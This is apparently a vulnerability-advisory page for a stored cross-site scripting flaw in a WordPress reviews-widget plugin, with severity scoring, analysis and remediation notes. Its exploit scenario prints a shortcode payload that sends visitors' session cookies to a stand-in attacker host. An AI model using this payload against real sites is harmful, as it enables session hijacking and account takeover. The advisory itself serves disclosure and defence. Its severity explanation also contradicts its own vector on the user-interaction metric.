Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
PR:L reflects required contributor auth; UI:R because a victim must visit the injected page; S:C for cross-context browser execution; no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Reviews Widgets for Google, Yelp & TripAdvisor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_id' shortcode attribute of the [fbrev] shortcode in versions up to and including 2.7.3. This is due to insufficient input sanitization and output escaping in the Feed_Shortcode::fbrev() method, which passes the raw shortcode attribute through Feed_Old::get_feed() into the View::render() method, where it is echoed directly into the data-id HTML attribute without esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the Reviews Widgets for Google, Yelp & TripAdvisor WordPress plugin (versions up to and including 2.7.3) allows authenticated attackers with contributor-level access to inject persistent malicious scripts into pages by abusing the 'page_id' attribute of the [fbrev] shortcode. The injected payload executes in the browsers of any user who subsequently visits the affected page, enabling session hijacking, credential theft, or further exploitation within the victim's browser context. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated WordPress account with at minimum contributor-level role, which grants the ability to create and submit posts containing shortcodes. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD/Wordfence-assigned CVSS base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) overstates exploitability slightly: the UI:N metric is debatable for stored XSS, since a victim must navigate to the injected page before execution occurs - traditional CVSS guidance treats this as UI:R, which would reduce the score to approximately 5.4. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with a contributor-level WordPress account creates or edits a post embedding the [fbrev page_id='<script>document.location="https://attacker.example/steal?c="+document.cookie</script>'] shortcode. When any authenticated user - including an administrator - subsequently visits the published page, the unsanitized payload executes in their browser, exfiltrating session cookies to the attacker's server and enabling session takeover. … |
| Remediation | An upstream code change is available via the WordPress plugin Trac changeset (revision 3593292 from 3451654 at plugins.trac.wordpress.org/changeset?new=3593292%40fb-reviews-widget&old=3451654%40fb-reviews-widget); however, the exact patched release version is not independently confirmed from the provided input data - upgrade to the latest available version from the WordPress plugin repository and verify the fix is present. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41894
GHSA-7g4w-hpm5-fjj3